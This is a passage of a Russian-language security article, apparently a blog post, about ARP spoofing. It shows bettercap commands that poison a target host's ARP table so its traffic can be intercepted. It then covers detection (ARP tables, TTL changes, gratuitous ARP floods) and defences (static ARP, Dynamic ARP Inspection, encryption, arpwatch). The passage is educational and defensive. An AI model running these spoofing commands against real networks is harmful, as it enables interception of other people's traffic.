  &lt;p id=&quot;Xp0u&quot;&gt; &lt;/p&gt;
  &lt;figure id=&quot;JlsZ&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/a1/76/a1763bd3-f46f-45eb-bc57-6e9b41e27843.png&quot; width=&quot;804&quot; /&gt;
    &lt;figcaption&gt;Запуск bettercap&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ypbd&quot;&gt;Используем следующие настройки:&lt;/p&gt;
  &lt;pre id=&quot;ijbX&quot;&gt;set arp.spoof.targets 192.168.150.233
set arp.spoof.internal true
arp.spoof on&lt;/pre&gt;
  &lt;p id=&quot;FYHE&quot;&gt;Параметр &lt;code&gt;arp.spoof.target&lt;/code&gt; устанавливает машину, ARP таблица которой будет отравлена (по умолчанию атака осуществляется на все машины в сети), &lt;code&gt;arp.spoof.internal true&lt;/code&gt; указывает на необходимость осуществления атаки на машины в локальной сети (по умолчанию атака осуществляется на шлюз), &amp;quot;&lt;code&gt;arp.spoof on&lt;/code&gt; запускает ARP spoofing атаку.&lt;/p&gt;
  &lt;figure id=&quot;PieI&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/a1/ae/a1ae16ae-6565-499d-9106-2cbd3b1aa549.png&quot; width=&quot;1097&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;LC13&quot;&gt;После запуска ARP spoofing, атакующий может просматривать трафик атакуемых узлов (т.к. весь трафик будет проходить через машину атакующего) при помощи программ для анализа сетевого трафика (например, при помощи Wireshark).&lt;/p&gt;
  &lt;h2 id=&quot;u6Yz&quot;&gt;Обнаружение&lt;/h2&gt;
  &lt;p id=&quot;s5GL&quot;&gt;Активный ARP-spoofing можно обнаружить несколькими способами:&lt;/p&gt;
  &lt;ul id=&quot;QdVe&quot;&gt;
    &lt;li id=&quot;L7Mv&quot;&gt;Просмотр ARP-таблицы.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure id=&quot;Ett8&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/42/f8/42f83d97-3825-4ec2-b35e-aae725237559.png&quot; width=&quot;546&quot; /&gt;
    &lt;figcaption&gt;Выделен IP-адрес атакующей машины&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;ul id=&quot;Szbt&quot;&gt;
    &lt;li id=&quot;5bB7&quot;&gt;Изменение времени жизни (TTL) ping пакета (некоторые инструменты могут модифицировать TTL).&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;RjRu&quot;&gt;При прохождении трафика через узел атакующего, TTL пакета уменьшается.&lt;/p&gt;
  &lt;figure id=&quot;GiLV&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e2/c5/e2c5cb3b-7860-4ba0-8357-ef8fae6249d5.png&quot; width=&quot;538&quot; /&gt;
  &lt;/figure&gt;
  &lt;ul id=&quot;r91m&quot;&gt;
    &lt;li id=&quot;jw4j&quot;&gt;Просмотр сетевого трафика при помощи программы для анализа сетевого трафика&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;A3kQ&quot;&gt;В данном случае хост получает большое количество Gratuitous ARP запросов от одного источника, что является аномалией сетевого трафика и может свидетельствовать об ARP spoofing атаке.&lt;/p&gt;
  &lt;figure id=&quot;Pfuy&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/c3/34/c334fdb6-23ff-4110-896b-be52f9aaa753.png&quot; width=&quot;1511&quot; /&gt;
  &lt;/figure&gt;
  &lt;h2 id=&quot;ysmC&quot;&gt;Рекомендации&lt;/h2&gt;
  &lt;ul id=&quot;0G7K&quot;&gt;
    &lt;li id=&quot;cEje&quot;&gt;Настройка статических ARP-таблиц.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;Urxw&quot;&gt;В небольших сетях для защиты от arp-spoofing атак на узлах в сети можно настроить статические ARP таблицы. Добавить статическую запись в ARP таблицу можно при помощи команды ОС Windows:&lt;/p&gt;
  &lt;pre id=&quot;9vvL&quot;&gt;netsh interface ip add neighbors $interface_name $IP $MAC=&lt;/pre&gt;
  &lt;p id=&quot;xpUp&quot;&gt;&lt;strong&gt;Примечание&lt;/strong&gt;: с ростом сети администрирование статических ARP таблиц становится достаточно сложной задачей.&lt;/p&gt;
  &lt;ul id=&quot;j6uh&quot;&gt;
    &lt;li id=&quot;l2Vb&quot;&gt;Настройка динамической проверки ARP (DAI).&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;1BHl&quot;&gt;Динамическая проверка ARP (Dynamic ARP Inspection, &lt;a href=&quot;http://xgu.ru/wiki/Dynamic_ARP_Protection&quot; target=&quot;_blank&quot;&gt;DAI&lt;/a&gt;) – это функция безопасности коммутатора, которая проверяет пакеты ARP в сети. DAI гарантирует, что ретранслируются только легитимные запросы и ответы ARP. Коммутатор выполняет следующие действия:&lt;/p&gt;
  &lt;ul id=&quot;zMl2&quot;&gt;
    &lt;ul id=&quot;CPs6&quot;&gt;
      &lt;li id=&quot;MDiw&quot;&gt;Перехватывает все ARP-запросы и ответы на недоверенных портах (для корректной работы DAI порты, к которым потенциально может получить доступ атакующий, помечаются как недоверенные (Untrusted) (обычно помечаются все порты, идущие к конечным узлам))&lt;/li&gt;
      &lt;li id=&quot;M5GJ&quot;&gt;Проверяет, что каждый из этих перехваченных пакетов имеет действительную привязку IP-адреса к MAC-адресу перед обновлением локальной ARP таблицы, или перед пересылкой пакета в соответствующий пункт назначения.&lt;/li&gt;
      &lt;li id=&quot;DdER&quot;&gt;Отбрасывает недействительные пакеты ARP.&lt;/li&gt;
    &lt;/ul&gt;
    &lt;li id=&quot;qCVt&quot;&gt;Использовать шифрование.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;Rrku&quot;&gt;Для снижения ущерба от атаки ARP-spoofing (как и любой MITM атаки) в локальной сети можно использовать протоколы шифрования данных для защиты передаваемой информации от атакующего. Например, такие протоколы как PPPoE или IPSec.&lt;/p&gt;
  &lt;ul id=&quot;JPI4&quot;&gt;
    &lt;li id=&quot;t6sA&quot;&gt;Использовать специальные программы для мониторинга ARP трафика и обнаружения аномалий (&lt;a href=&quot;https://arpon.sourceforge.io/&quot; target=&quot;_blank&quot;&gt;ArpON&lt;/a&gt;, &lt;a href=&quot;https://www.kali.org/tools/arpwatch/&quot; target=&quot;_blank&quot;&gt;arpwatch&lt;/a&gt;, &lt;a href=&quot;https://bitcomet.com/en/tools/antiarp&quot; target=&quot;_blank&quot;&gt;BitCometAntiARP&lt;/a&gt;).&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;p7kt&quot;&gt;Данные программы анализируют ARP пакеты, предаваемые по сети, запоминают соответствие IP и MAC адресов. Если соответствие нарушено, или обнаружено появление новых MAC адресов в сети, генерируются соответствующее события в системном журнале.&lt;/p&gt;

</content></entry></feed>